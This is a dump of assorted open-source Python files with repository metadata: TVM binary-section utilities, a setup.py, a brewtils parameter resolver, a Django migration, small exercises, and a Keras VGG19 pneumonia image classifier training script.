e2d6456c256f4a60fc99dba68620b3386e945429 | 7,033 | py | Python | python/tvm/contrib/binutil.py | uwsampl/tvm | 29a85eb8f75dbd3a338db0b28c2121ca997eb2a4 | [
"Apache-2.0"
] | 2 | 2019-12-27T04:50:01.000Z | 2021-02-04T09:54:21.000Z | python/tvm/contrib/binutil.py | uwsampl/tvm | 29a85eb8f75dbd3a338db0b28c2121ca997eb2a4 | [
"Apache-2.0"
] | null | null | null | python/tvm/contrib/binutil.py | uwsampl/tvm | 29a85eb8f75dbd3a338db0b28c2121ca997eb2a4 | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Utilities for binary file manipulation"""
import os
import subprocess
from . import util
from .._ffi.base import py_str
from ..api import register_func
@register_func("tvm_callback_get_section_size")
def tvm_callback_get_section_size(binary_path, section_name):
"""Finds size of the section in the binary.
Assumes `size` shell command exists (typically works only on Linux machines)
Parameters
----------
binary_path : str
path of the binary file
section_name : str
name of section
Return
------
size : integer
size of the section in bytes
"""
if not os.path.isfile(binary_path):
raise RuntimeError("no such file \"{}\"".format(binary_path))
# We use the "-A" flag here to get the ".rodata" section's size, which is
# not included by default.
size_proc = subprocess.Popen(["size", "-A", binary_path], stdout=subprocess.PIPE)
(size_output, _) = size_proc.communicate()
if size_proc.returncode != 0:
msg = "error in finding section size:\n"
msg += py_str(out)
raise RuntimeError(msg)
size_output = size_output.decode("utf-8")
section_size = 0
# Skip the first two header lines in the `size` output.
for line in size_output.split("\n")[2:]:
tokens = list(filter(lambda s: len(s) != 0, line.split(" ")))
if len(tokens) != 3:
continue
entry_name = tokens[0]
entry_size = int(tokens[1])
if entry_name.startswith("." + section_name):
# The `.rodata` section should be the only section for which we
# need to collect the size from *multiple* entries in the command
# output.
if section_size != 0 and not entry_name.startswith(".rodata"):
raise RuntimeError(
"multiple entries in `size` output for section {}".format(section_name))
section_size += entry_size
return section_size
@register_func("tvm_callback_relocate_binary")
def tvm_callback_relocate_binary(binary_path, text_addr, rodata_addr, data_addr, bss_addr):
"""Relocates sections in the binary to new addresses
Parameters
----------
binary_path : str
path of the binary file
text_addr : str
text section address
rodata_addr : str
rodata section address
data_addr : str
data section address
bss_addr : str
bss section address
Return
------
rel_bin : bytearray
the relocated binary
"""
tmp_dir = util.tempdir()
rel_obj = tmp_dir.relpath("relocated.o")
ld_script_contents = """
SECTIONS
{
. = %s;
. = ALIGN(8);
.text :
{
*(.text)
. = ALIGN(8);
*(.text*)
}
. = %s;
. = ALIGN(8);
.rodata :
{
*(.rodata)
. = ALIGN(8);
*(.rodata*)
}
. = %s;
. = ALIGN(8);
.data :
{
*(.data)
. = ALIGN(8);
*(.data*)
}
. = %s;
. = ALIGN(8);
.bss :
{
*(.bss)
. = ALIGN(8);
*(.bss*)
}
}
""" % (text_addr, rodata_addr, data_addr, bss_addr)
rel_ld_script = tmp_dir.relpath("relocated.lds")
with open(rel_ld_script, "w") as f:
f.write(ld_script_contents)
ld_proc = subprocess.Popen(["ld", binary_path,
"-T", rel_ld_script,
"-o", rel_obj],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
(out, _) = ld_proc.communicate()
if ld_proc.returncode != 0:
msg = "linking error using ld:\n"
msg += py_str(out)
raise RuntimeError(msg)
with open(rel_obj, "rb") as f:
rel_bin = bytearray(f.read())
return rel_bin
@register_func("tvm_callback_read_binary_section")
def tvm_callback_read_binary_section(binary, section):
"""Returns the contents of the specified section in the binary byte array
Parameters
----------
binary : bytearray
contents of the binary
section : str
type of section
Return
------
section_bin : bytearray
contents of the read section
"""
tmp_dir = util.tempdir()
tmp_bin = tmp_dir.relpath("temp.bin")
tmp_section = tmp_dir.relpath("tmp_section.bin")
with open(tmp_bin, "wb") as out_file:
out_file.write(bytes(binary))
objcopy_proc = subprocess.Popen(["objcopy", "--dump-section",
".{}={}".format(section, tmp_section),
tmp_bin],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
(out, _) = objcopy_proc.communicate()
if objcopy_proc.returncode != 0:
msg = "error in using objcopy:\n"
msg += py_str(out)
raise RuntimeError(msg)
if os.path.isfile(tmp_section):
# Get section content if it exists.
with open(tmp_section, "rb") as f:
section_bin = bytearray(f.read())
else:
# Return empty bytearray if the section does not exist.
section_bin = bytearray("", "utf-8")
return section_bin
@register_func("tvm_callback_get_symbol_map")
def tvm_callback_get_symbol_map(binary):
"""Obtains a map of symbols to addresses in the passed binary
Parameters
----------
binary : bytearray
contents of the binary
Return
------
map_str : str
map of defined symbols to addresses, encoded as a series of
alternating newline-separated keys and values
"""
tmp_dir = util.tempdir()
tmp_obj = tmp_dir.relpath("tmp_obj.bin")
with open(tmp_obj, "wb") as out_file:
out_file.write(bytes(binary))
nm_proc = subprocess.Popen(["nm", "-C", "--defined-only", tmp_obj],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
(out, _) = nm_proc.communicate()
if nm_proc.returncode != 0:
msg = "error in using nm:\n"
msg += py_str(out)
raise RuntimeError(msg)
out = out.decode("utf8").splitlines()
map_str = ""
for line in out:
line = line.split()
map_str += line[2] + "\n"
map_str += line[0] + "\n"
return map_str
| 30.055556 | 92 | 0.60273 | 0 | 0 | 0 | 0 | 6,080 | 0.864496 | 0 | 0 | 3,480 | 0.49481 |
e2dbd8f583af2e25d8d0350376cb81880e383ce4 | 25 | py | Python | src/tools/__init__.py | Talengi/phase | 60ff6f37778971ae356c5b2b20e0d174a8288bfe | [
"MIT"
] | 8 | 2016-01-29T11:53:40.000Z | 2020-03-02T22:42:02.000Z | src/tools/__init__.py | PhaseDMS/phase | 4f776d0b1b5e7916a3e26aee890b3c2b9454ef0e | [
"MIT"
] | 289 | 2015-03-23T07:42:52.000Z | 2022-03-11T23:26:10.000Z | src/tools/__init__.py | Talengi/phase | 60ff6f37778971ae356c5b2b20e0d174a8288bfe | [
"MIT"
] | 7 | 2015-12-08T09:03:20.000Z | 2020-05-11T15:36:51.000Z | """Miscelanous tools."""
| 12.5 | 24 | 0.64 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 24 | 0.96 |
e2dbe9c76ca624c9fbd50f0a72f93f20df4c9250 | 831 | py | Python | setup.py | myslak71/dmt | fcf892391656c02118733db6680d9e4e33b59495 | [
"MIT"
] | 1 | 2019-01-30T14:05:25.000Z | 2019-01-30T14:05:25.000Z | setup.py | myslak71/dmt | fcf892391656c02118733db6680d9e4e33b59495 | [
"MIT"
] | null | null | null | setup.py | myslak71/dmt | fcf892391656c02118733db6680d9e4e33b59495 | [
"MIT"
] | null | null | null | import os
from setuptools import setup, find_packages
DIR_PATH = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(DIR_PATH, 'README.md')) as file:
long_description = file.read()
install_requires = [line.rstrip('\n') for line in open(os.path.join(DIR_PATH, 'requirements.txt'))]
setup(
name='dmt',
version='0.1.10',
packages=find_packages(),
author='kedod',
author_email='kedod@protonmail.com',
description='Log time from toggl entries to Jira smoothly.',
url='https://github.com/kedod/dmt',
download_url = 'https://github.com/kedod/dmt/archive/v0.1.10.tar.gz',
keywords=['toggl', 'jira', 'logger', 'logging'],
long_description=long_description,
include_package_data=True,
install_requires=install_requires,
package_data={
'': ['*.yaml']
}
)
| 28.655172 | 99 | 0.683514 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 245 | 0.294826 |
e2dd7fd24d1c7212ab9397da79dd030d977de222 | 159 | py | Python | card_dispenser_test.py | Denexapp/mannequin | 400918ac77baa8c2a9b93d96ae12a5d5955275bc | [
"MIT"
] | null | null | null | card_dispenser_test.py | Denexapp/mannequin | 400918ac77baa8c2a9b93d96ae12a5d5955275bc | [
"MIT"
] | null | null | null | card_dispenser_test.py | Denexapp/mannequin | 400918ac77baa8c2a9b93d96ae12a5d5955275bc | [
"MIT"
] | null | null | null | import card_dispenser
import time
card_dispenser_object = card_dispenser.card_dispenser()
while True:
card_dispenser_object.give_card()
time.sleep(10) | 22.714286 | 55 | 0.811321 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
e2ddbc96cd11bd3a0665665c3f5416de81dbb4d5 | 4,062 | py | Python | brewtils/resolvers/manager.py | scott-taubman/brewtils | 3478e5ebd6383d7724286c9d0c7afac9ef5d7b45 | [
"MIT"
] | null | null | null | brewtils/resolvers/manager.py | scott-taubman/brewtils | 3478e5ebd6383d7724286c9d0c7afac9ef5d7b45 | [
"MIT"
] | null | null | null | brewtils/resolvers/manager.py | scott-taubman/brewtils | 3478e5ebd6383d7724286c9d0c7afac9ef5d7b45 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import logging
from typing import Any, Dict, List, Mapping
try:
from collections import Mapping as CollectionsMapping
except ImportError:
from collections.abc import Mapping as CollectionsMapping
from brewtils.models import Parameter, Resolvable
from brewtils.resolvers.bytes import BytesResolver
from brewtils.resolvers.chunks import ChunksResolver
from brewtils.resolvers.identity import IdentityResolver
from brewtils.schema_parser import SchemaParser
def build_resolver_map(easy_client=None):
"""Builds all resolvers"""
return [
IdentityResolver(), # This should always be first
BytesResolver(easy_client),
ChunksResolver(easy_client),
]
class ResolutionManager(object):
"""Parameter resolution manager
This class is used under-the-hood for various plugin functions. Its purpose is to
remove all the various cleanup and housekeeping steps involved in resolving
parameters. An example of an unresolved parameter is a dictionary which represents a
bytes object. In this case the user wants the open file descriptor, not the random
dictionary that they don't know how to process. The parameter resolver helps handle
these scenarios.
This is intended for internal use for the plugin class.
"""
def __init__(self, **kwargs):
self.logger = logging.getLogger(__name__)
self.resolvers = build_resolver_map(**kwargs)
def resolve(self, values, definitions=None, upload=True):
# type: (Mapping[str, Any], List[Parameter], bool) -> Dict[str, Any]
"""Iterate through parameters, resolving as necessary
Args:
values: Dictionary of request parameter values
definitions: Parameter definitions
upload: Controls which methods will be called on resolvers
Returns:
The resolved parameter dict
"""
resolved_parameters = {}
for key, value in values.items():
# First find the matching Parameter definition, if possible
definition = Parameter()
for param_def in definitions or []:
if param_def.key == key:
definition = param_def
break
# Check to see if this is a nested parameter
if isinstance(value, CollectionsMapping) and definition.parameters:
resolved = self.resolve(
value, definitions=definition.parameters, upload=upload
)
# See if this is a multi parameter
elif isinstance(value, list):
# This is kind of gross because multi-parameters are kind of gross
# We have to wrap everything into the correct form and pull it out
resolved = []
for item in value:
resolved_item = self.resolve(
{key: item}, definitions=definitions, upload=upload
)
resolved.append(resolved_item[key])
# This is a simple parameter
else:
# See if this is a parameter that needs to be resolved
for resolver in self.resolvers:
if upload and resolver.should_upload(value, definition):
resolvable = resolver.upload(value, definition)
resolved = SchemaParser.serialize(resolvable, to_string=False)
break
elif (
not upload
and resolver.should_download(value, definition)
and isinstance(value, Mapping)
):
resolvable = Resolvable(**value)
resolved = resolver.download(resolvable, definition)
break
# Just a normal parameter
else:
resolved = value
resolved_parameters[key] = resolved
return resolved_parameters
| 37.266055 | 88 | 0.609306 | 3,342 | 0.822747 | 0 | 0 | 0 | 0 | 0 | 0 | 1,389 | 0.34195 |
e2de0a9341a0679887e57b9901b796e25b230e85 | 327 | py | Python | python_exercises/Curso_em_video/ex011.py | Matheus-IT/lang-python-related | dd2e5d9b9f16d3838ba1670fdfcba1fa3fe305e9 | [
"MIT"
] | null | null | null | python_exercises/Curso_em_video/ex011.py | Matheus-IT/lang-python-related | dd2e5d9b9f16d3838ba1670fdfcba1fa3fe305e9 | [
"MIT"
] | null | null | null | python_exercises/Curso_em_video/ex011.py | Matheus-IT/lang-python-related | dd2e5d9b9f16d3838ba1670fdfcba1fa3fe305e9 | [
"MIT"
] | null | null | null | b = float(input('\033[36mQual a largura da parede? \033[m'))
h = float(input('\033[32mQual a altura da parede? \033[m'))
a = b * h
print('\033[36mSua parede tem dimensão {} x {} e sua área é de {:.3f}m².\033[m'.format(b, h, a))
print('\033[32mPara pintar essa parede, você precisará de {}L de tinta.\033[m'.format(a / 2))
| 54.5 | 97 | 0.642202 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 234 | 0.702703 |
e2e02ccb6ac1cca4a93470eb0dd9419960f28e58 | 1,062 | py | Python | labs/tony-monday-10-jg113/exam_marks_4.py | TonyJenkins/lbu-python-code | d02d843290e887d016cdb05ddc1a8639874f2e06 | [
"Unlicense"
] | 2 | 2021-08-20T13:02:45.000Z | 2021-10-03T20:34:45.000Z | labs/tony-monday-10-jg113/exam_marks_4.py | TonyJenkins/lbu-python-code | d02d843290e887d016cdb05ddc1a8639874f2e06 | [
"Unlicense"
] | null | null | null | labs/tony-monday-10-jg113/exam_marks_4.py | TonyJenkins/lbu-python-code | d02d843290e887d016cdb05ddc1a8639874f2e06 | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python3
NUMBER_OF_MARKS = 5
def avg(numbers):
return sum(numbers) / len(numbers)
def valid_mark(mark):
return 0 <= mark <= 100
def read_marks(number_of_marks):
marks_read = []
for count in range(number_of_marks):
while True:
mark = int(input(f'Enter mark #{count + 1}: '))
if valid_mark(mark):
break
else:
print('Mark out of range. Try again.')
marks_read.append(mark)
return marks_read
def letter_grade(mark):
if mark > 70:
return 'A'
elif mark > 60:
return 'B'
elif mark > 50:
return 'C'
elif mark > 40:
return 'D'
else:
return 'F'
def print_results(marks):
print()
print(f'Maximum Mark: {max(marks)}')
print(f'Minimum Mark: {min(marks)}')
print(f'Average Mark: {avg(marks):.2f}')
print()
print(f'Grade: {letter_grade(avg(marks))}')
if __name__ == '__main__':
mark_list = read_marks(NUMBER_OF_MARKS)
print_results(mark_list)
| 19.309091 | 60 | 0.568738 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 241 | 0.22693 |
e2e151be842d9c1c84c0a1b32ad5def096f0dfda | 8,668 | py | Python | account/migrations/0004_auto__add_field_userprofile_sjtu_id__add_field_userprofile_sjtu_initpa.py | liweitianux/django-skaschool | 2ff96ef814d1c0e4dc3464418290236797bae038 | [
"BSD-2-Clause"
] | 1 | 2018-04-09T15:45:05.000Z | 2018-04-09T15:45:05.000Z | account/migrations/0004_auto__add_field_userprofile_sjtu_id__add_field_userprofile_sjtu_initpa.py | liweitianux/django-skaschool | 2ff96ef814d1c0e4dc3464418290236797bae038 | [
"BSD-2-Clause"
] | null | null | null | account/migrations/0004_auto__add_field_userprofile_sjtu_id__add_field_userprofile_sjtu_initpa.py | liweitianux/django-skaschool | 2ff96ef814d1c0e4dc3464418290236797bae038 | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'UserProfile.sjtu_id'
db.add_column(u'account_userprofile', 'sjtu_id',
self.gf('django.db.models.fields.CharField')(default='', max_length=15, blank=True),
keep_default=False)
# Adding field 'UserProfile.sjtu_initpass'
db.add_column(u'account_userprofile', 'sjtu_initpass',
self.gf('django.db.models.fields.CharField')(default='', max_length=10, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'UserProfile.sjtu_id'
db.delete_column(u'account_userprofile', 'sjtu_id')
# Deleting field 'UserProfile.sjtu_initpass'
db.delete_column(u'account_userprofile', 'sjtu_initpass')
models = {
u'account.userfile': {
'Meta': {'ordering': "['user', 'id']", 'object_name': 'UserFile'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'file': ('account.extra.ContentTypeRestrictedFileField', [], {'content_types': "['application/gzip', 'application/msword', 'application/pdf', 'application/postscript', 'application/rar', 'application/vnd.ms-excel', 'application/vnd.oasis.opendocument.spreadsheet', 'application/vnd.oasis.opendocument.text', 'application/vnd.oasis.opendocument.presentation', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 'application/vnd.openxmlformats-officedocument.presentationml.presentation', 'application/wps-office.doc', 'application/wps-office.dps', 'application/wps-office.et', 'application/wps-office.ppt', 'application/wps-office.pptx', 'application/wps-office.wps', 'application/wps-office.xls', 'application/zip', 'application/x-7z-compressed', 'application/x-bzip2', 'application/x-dvi', 'application/x-latex', 'application/x-rar-compressed', 'application/x-tar', 'image/bmp', 'image/gif', 'image/jpeg', 'image/png', 'image/tiff', 'text/csv', 'text/plain', 'text/rtf', 'text/x-markdown', 'text/x-tex']", 'max_upload_size': '10485760', 'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'account.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'identity': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'institute': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'is_approved': ('django.db.models.fields.CharField', [], {'default': "'C'", 'max_length': '1'}),
'is_checkin': ('django.db.models.fields.CharField', [], {'default': "'X'", 'max_length': '1'}),
'is_sponsored': ('django.db.models.fields.CharField', [], {'default': "'C'", 'max_length': '1'}),
'realname': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'reason': ('django.db.models.fields.TextField', [], {}),
'sjtu_id': ('django.db.models.fields.CharField', [], {'max_length': '15', 'blank': 'True'}),
'sjtu_initpass': ('django.db.models.fields.CharField', [], {'max_length': '10', 'blank': 'True'}),
'supplement': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'transcript': ('account.extra.ContentTypeRestrictedFileField', [], {'content_types': "['application/gzip', 'application/msword', 'application/pdf', 'application/postscript', 'application/rar', 'application/vnd.ms-excel', 'application/vnd.oasis.opendocument.spreadsheet', 'application/vnd.oasis.opendocument.text', 'application/vnd.oasis.opendocument.presentation', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 'application/vnd.openxmlformats-officedocument.presentationml.presentation', 'application/wps-office.doc', 'application/wps-office.dps', 'application/wps-office.et', 'application/wps-office.ppt', 'application/wps-office.pptx', 'application/wps-office.wps', 'application/wps-office.xls', 'application/zip', 'application/x-7z-compressed', 'application/x-bzip2', 'application/x-dvi', 'application/x-latex', 'application/x-rar-compressed', 'application/x-tar', 'image/bmp', 'image/gif', 'image/jpeg', 'image/png', 'image/tiff', 'text/csv', 'text/plain', 'text/rtf', 'text/x-markdown', 'text/x-tex']", 'max_upload_size': '10485760', 'null': 'True', 'max_length': '100', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'unique': 'True'})
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['account'] | 90.291667 | 1,204 | 0.62102 | 8,501 | 0.980734 | 0 | 0 | 0 | 0 | 0 | 0 | 6,369 | 0.734772 |
e2e18396a6d1962265c20433bef9b5473eadd7dd | 1,689 | py | Python | tests/mp.py | dmxj/icv | 0b074ec9475f2c70038d2e8b7166414fd5b93e61 | [
"MIT"
] | 5 | 2019-09-10T04:02:19.000Z | 2020-07-24T07:46:08.000Z | tests/mp.py | dmxj/icv | 0b074ec9475f2c70038d2e8b7166414fd5b93e61 | [
"MIT"
] | null | null | null | tests/mp.py | dmxj/icv | 0b074ec9475f2c70038d2e8b7166414fd5b93e61 | [
"MIT"
] | 1 | 2020-03-20T03:44:04.000Z | 2020-03-20T03:44:04.000Z | from multiprocessing import Pool, Queue
import multiprocessing
import threading
import time
def test(x):
x0,x1,x2 = x
time.sleep(2)
return x0+x1+x2, x0*x1*x2
# if p==10000:
# return True
# else:
# return False
class Dog():
def __init__(self):
pass
def go(self,name):
return "hello %s" % name
def tt(n):
n = "rensike"
return
if __name__ == "__main__":
# result=Queue() #队列
# pool = Pool()
# def pool_th():
# for i in range(50000000): ##这里需要创建执行的子进程非常多
# try:
# result.put(pool.apply_async(test, args=(i,)))
# except:
# break
# def result_th():
# while 1:
# a=result.get().get() #获取子进程返回值
# if a:
# pool.terminate() #结束所有子进程
# break
# '''
# 利用多线程,同时运行Pool函数创建执行子进程,以及运行获取子进程返回值函数。
# '''
# t1=threading.Thread(target=pool_th)
# t2=threading.Thread(target=result_th)
# t1.start()
# t2.start()
# t1.join()
# t2.join()
# pool.join()
# p = multiprocessing.Pool(1)
# rslt = p.map(test, ((3,6,9),))
# print(rslt[0])
from multiprocessing import Pool
# import numpy as np
#
# def foo(a):
# return "hello {}".format(a)
#
# p = Pool()
# result = p.apply_async(foo, args=(np.random.random((2,3)),))
# # foo和a分别是你的方法和参数,这行可以写多个,执行多个进程,返回不同结果
# p.close()
# p.join()
#
# r = result.get()
#
# print(r)
# p = Pool()
# d = Dog()
# result = p.apply_async(d.go,args=("sikeppp",))
#
# p.close()
# p.join()
#
# r = result.get()
# print(r)
| 20.597561 | 66 | 0.503848 | 106 | 0.056114 | 0 | 0 | 0 | 0 | 0 | 0 | 1,259 | 0.66649 |
e2e2636a936283d6012ec94041d4e569e1a7ef83 | 893 | py | Python | dudes/Util.py | rababerladuseladim/dudes | aed526df8295210e82e89fef9c9bb45daae3be3e | [
"MIT"
] | 7 | 2018-01-03T12:52:28.000Z | 2022-02-15T02:49:15.000Z | dudes/Util.py | pirovc/dudes | aed526df8295210e82e89fef9c9bb45daae3be3e | [
"MIT"
] | 1 | 2019-05-01T14:54:23.000Z | 2022-02-14T12:06:20.000Z | dudes/Util.py | rababerladuseladim/dudes | aed526df8295210e82e89fef9c9bb45daae3be3e | [
"MIT"
] | 2 | 2019-05-08T19:26:21.000Z | 2021-04-15T10:20:01.000Z | from dudes.Ranks import Ranks
import numpy as np
import sys
def printDebug(DEBUG, l):
if DEBUG: sys.stderr.write(str(l) + "\n")
def group_max(groups, data, pre_order=None):
if pre_order is None:
order = np.lexsort((data, groups))
else:
order = pre_order
groups = groups[order] #this is only needed if groups is unsorted
data = data[order]
index = np.empty(len(groups), 'bool')
index[-1] = True
index[:-1] = groups[1:] != groups[:-1]
if pre_order is None:
return order, index
else:
return index # Return the data array in an orderer way (matching the output of np.unique(groups))
def getNameRank(rankid):
# Returns the fixed ranks based on rankid
if rankid<len(Ranks.ranks):
return Ranks.ranks[rankid]
else:
return Ranks.ranks[-1] # more than one no_rank/strain
def getIndexRank(rank):
# Returns the fixed ranks based on rankid
return Ranks.ranks.index(rank) | 27.90625 | 99 | 0.714446 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 248 | 0.277716 |
e2e28b984f3ba5f8bd9d10b8dab354d8e3919ab9 | 4,169 | py | Python | train.py | Raghavkumarkakar252/Pneumonia_Diagnosis | 0c68d78ce4855289c7e335fde5f5caec2ba5a315 | [
"MIT"
] | null | null | null | train.py | Raghavkumarkakar252/Pneumonia_Diagnosis | 0c68d78ce4855289c7e335fde5f5caec2ba5a315 | [
"MIT"
] | null | null | null | train.py | Raghavkumarkakar252/Pneumonia_Diagnosis | 0c68d78ce4855289c7e335fde5f5caec2ba5a315 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Feb 3 10:27:25 2019
@author: alishbaimran
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from imutils import paths
from sklearn.metrics import classification_report
from sklearn.metrics import accuracy_score
from keras.applications import VGG19
from keras.preprocessing.image import ImageDataGenerator
from keras.optimizers import SGD
from keras.models import Model
from keras.layers import Dropout, Flatten, Dense, GlobalAveragePooling2D
from keras.callbacks import EarlyStopping
# defining constants and variables
img_width, img_height = 128, 128
train_data_dir = "data/train"
validation_data_dir = "data/val"
test_data_dir = "data/test"
NB = 2
BS = 64
EPOCHS = 10
# creating train, validation and test data generators
TRAIN = len(list(paths.list_images(train_data_dir)))
VAL = len(list(paths.list_images(validation_data_dir)))
TEST = len(list(paths.list_images(test_data_dir)))
trainAug = ImageDataGenerator(rescale = 1./255,
fill_mode = "nearest")
valAug = ImageDataGenerator(rescale = 1./255,
fill_mode = "nearest")
trainGen = trainAug.flow_from_directory(
train_data_dir,
target_size = (img_height, img_width),
batch_size = BS,
shuffle = True,
class_mode = "categorical")
valGen = valAug.flow_from_directory(
validation_data_dir,
target_size = (img_height, img_width),
batch_size = BS,
shuffle = False,
class_mode = "categorical")
testGen = valAug.flow_from_directory(
test_data_dir,
target_size = (img_height, img_width),
batch_size = BS,
shuffle = False,
class_mode = "categorical")
# loading pre-trained model, training additional features and saving model
base_model = VGG19(weights = "imagenet", include_top=False,
input_shape = (img_width, img_height, 3))
x = base_model.output
x = Flatten()(x)
x = Dense(1024, activation = "relu")(x)
x = Dropout(0.4)(x)
x = Dense(256, activation = "relu")(x)
x = Dropout(0.2)(x)
preds = Dense(NB, activation = "softmax")(x)
model = Model(input = base_model.input, output = preds)
for i,layer in enumerate(model.layers):
print(i,layer.name)
for layer in model.layers[:16]:
layer.trainable=False
for layer in model.layers[16:]:
layer.trainable=True
model.summary()
early = EarlyStopping(monitor = 'val_acc', min_delta = 0,
patience = 10, verbose= 1 , mode = 'auto')
model.compile(loss = "binary_crossentropy",
optimizer = SGD(lr=0.001, momentum=0.9),
metrics=["accuracy"])
H = model.fit_generator(
trainGen,
epochs = EPOCHS,
steps_per_epoch = TRAIN // BS,
validation_data = valGen,
validation_steps = VAL // BS,
callbacks = [early])
model.save('model.h5')
# generating predictions using model
testGen.reset()
predictions = model.predict_generator(testGen, steps = (TEST // BS) + 1)
predictions = np.argmax(predictions, axis=1)
print("Test set accuracy: " +
str(accuracy_score(testGen.classes, predictions, normalize=True) * 100)
+ "%")
print(classification_report(testGen.classes, predictions,
target_names=testGen.class_indices.keys()))
# plotting training data
plt.style.use("ggplot")
plt.figure()
plt.plot(np.arange(0, EPOCHS), H.history["loss"], label="train_loss")
plt.plot(np.arange(0, EPOCHS), H.history["val_loss"], label="val_loss")
plt.plot(np.arange(0, EPOCHS), H.history["acc"], label="train_acc")
plt.plot(np.arange(0, EPOCHS), H.history["val_acc"], label="val_acc")
plt.title("Training Loss and Accuracy on Dataset")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend(loc="lower left")
plt.savefig("plot.jpg") | 31.824427 | 79 | 0.630367 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 709 | 0.170065 |
e2e33b457fd2b88a3ff24791b4d153005a095c56 | 24,503 | py | Python | core/migrations/0001_initial.py | bpotvin-bccrc/colossus | fa5ca7ce4cfe794c7d2167acb868aa9167988941 | [
"MIT"
